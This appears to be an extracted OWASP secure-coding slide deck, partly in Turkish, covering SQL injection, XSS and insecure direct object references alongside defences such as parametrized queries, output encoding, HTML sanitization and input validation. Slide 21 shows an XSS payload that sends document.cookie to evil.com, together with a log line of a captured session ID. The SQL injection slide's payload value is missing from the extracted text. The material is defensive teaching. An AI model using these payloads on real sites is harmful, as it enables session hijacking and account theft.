Bünyamin Demir - Secure YourApp
- 2. Bünyamin Demir ( @bunyamindemir )
– Lisans Kocaeli Üni. Matematik Bölümü
– Yüksek Lisans Kocaeli Üni Fen-Bilimleri, Tez; Oracle Veritabanı
Güvenliği
– Uygulama Geliştirici
– OWASP Türkiye Bölüm Lideri
– Sızma Testleri Uzmanı
• Web, Mobil, Network, SCADA, Wireless,
Sosyal Mühendislik, ATM, DoS/DDoS ve Yük testi
• Kaynak kod analizi
– Eğitmen
• Web/Mobil Uygulama Güvenlik Denetimi
• Güvenli Kod Geliştirme
• Veritabanı Güvenliği
2
- 5. • OWASP Top 10
• OWASP Zed Attack Proxy (ZAP)
• OpenSAMM
• Cheat Sheets
• ESAPI
• ASVS
• Testing Guide
• Development Guide
5
OWASP Projects
- 13. Anatomy of SQL Injection Attack
13
sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) &
“’ AND password = ‘” & Request
(“password”) & ”’”
What the developer intended:
username = john
password = password
SQL Query:
SELECT * FROM user_table WHERE username = ‘john’ AND password = ‘password’
- 14. Anatomy of SQL Injection Attack
14
sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “ ’ AND
password = ‘ ” & Request(“password”) & “ ’ ”
(This is DYNAMIC SQL and Untrusted Input)
What the developer did not intend is parameter values like:
username = john
password =
SQL Query:
SELECT * FROM user_table WHERE username = ‘john’ AND password =
causes all rows in the users table to be returned!
- 15. Bind Parameters (PHP)
15
$stmt = $dbh->prepare(”update users set
email=:new_email where id=:user_id”);
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
- 16. Parametrized Query (.NET)
16
SqlConnection objConnection = new
SqlConnection(_ConnectionString);
objConnection.Open();
SqlCommand objCommand = new SqlCommand(
"SELECT * FROM User WHERE Name = @Name
AND Password = @Password", objConnection);
objCommand.Parameters.Add("@Name",
NameTextBox.Text);
objCommand.Parameters.Add("@Password",
PassTextBox.Text);
SqlDataReader objReader =
objCommand.ExecuteReader();
- 17. Prepare Statement (Java)
17
String newName = request.getParameter("newName") ;
String id = request.getParameter("id");
//SQL
PreparedStatement pstmt = con.prepareStatement("UPDATE
EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);
//HQL
Query safeHQLQuery = session.createQuery("from
Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
- 20. Anatomy of XSS Attack
20
http://www.davshan.loc/friends.php?search=<abc>
<p>Result for <b><abc></b> :0<p><br />
http://www.davshan.loc/friends.php?search=<script>alert(1);</script>
- 21. Anatomy of XSS Attack
21
<script>document.write("<img src='http://www.evil.com?"+document.cookie+"'>")</script>
187.4.1.32 - - [28/Feb/2012:00:38:32 +0200] "GET /?PHPSESSID=ulc1141mm2tehjhfdqh1ktfas5
HTTP/1.1" 200 7425 "http://www.davshan.loc/....
- 22. OWASP Java Encoder Project
22
<%-- Basic HTML Context --%>
<body><b><%= Encode.forHtml(UNTRUSTED) %>" /></b></body>
<%-- HTML Attribute Context --%>
<input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED)
%>" />
<%-- Javascript Block context --%>
<script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg);
</script>
<%-- Javascript Variable context --%>
<button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED)
%>');">click me</button>
- 24. OWASP HTML Sanitizer Project
24
PolicyFactory policy = new HtmlPolicyBuilder()
.allowElements("a")
.allowUrlProtocols("https")
.allowAttributes("href").onElements("a")
.requireRelNofollowOnLinks()
.build();
String safeHTML = policy.sanitize(untrustedHTML);
- 26. A4 – Insecure Direct Object References
26
• Attacker notices his acct
parameter is 6065
?acct=6065
• He modifies it to a nearby
number
?acct=6066
• Attacker views the victim’s
account information
https://www.onlinebank.com/user?acct=6065
- 28. Input Validation - Java
28
public boolean validateUsername(String username) {
String usernamePattern = "^[a-zA-Z0-9]{6,12}$";
if (username == null) {
return false;
}
Pattern p = Pattern.compile(usernamePattern);
Matcher m = p.matcher(username);
if (!m.matches()) {
return false;
}
return true;
}
if (!validateUsername(username))
{
//invalid username
}
- 29. Input Validation - .NET
29
if (!Regex.IsMatch(TxtSinifAdi.Text, @"^[a-zA-Z0-9.s]{1,10}$"))
{
// sinif ismi uygun değildir
}